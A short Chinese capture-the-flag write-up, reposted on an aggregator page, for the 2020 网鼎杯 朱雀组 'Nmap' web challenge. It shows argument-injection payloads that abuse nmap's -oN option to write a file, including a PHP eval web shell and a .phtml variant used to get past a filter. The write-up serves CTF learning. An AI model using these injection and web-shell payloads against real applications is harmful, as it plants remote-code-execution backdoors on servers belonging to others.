[网鼎杯 2020 朱雀组]Nmap - 走看看

zoukankan html css js c++ java

[网鼎杯 2020 朱雀组]Nmap
[网鼎杯 2020 朱雀组]Nmap

nmap

本题的考点是利用nmap的-oN写shell。
```
nmap -oN xxx.txt
```
先构造：
```
' -oN w4ke.txt '
```
返回了Host maybe down，然后访问一下w4ke.txt

构造：
```
' -oN w4ke.php <?php eval($_POST['w4ke']); ?>  '
```
返回了Hacker...

fuzz了一下，发现了php被过滤，phtml可以用。
于是构造：
```
'  -oN w4ke.phtml <?=eval($_POST['w4ke']); ?> '
```
cat flag 即可
查看全文

相关阅读:
Python 不同数据类型比较
 计算机外语收集
 d3.js学习-联系力学图
 d3.js学习11
d3.js学习10
d3.js学习9
d3.js学习8
[springboot jpa] [bug] Could not open JPA EntityManager for transaction
[spring cloud feign] [bug] 使用对象传输get请求参数
 [ethereum源码分析](5) 创建新账号

原文地址：https://www.cnblogs.com/shenjuxian/p/13973750.html

Copyright © 2011-2022 走看看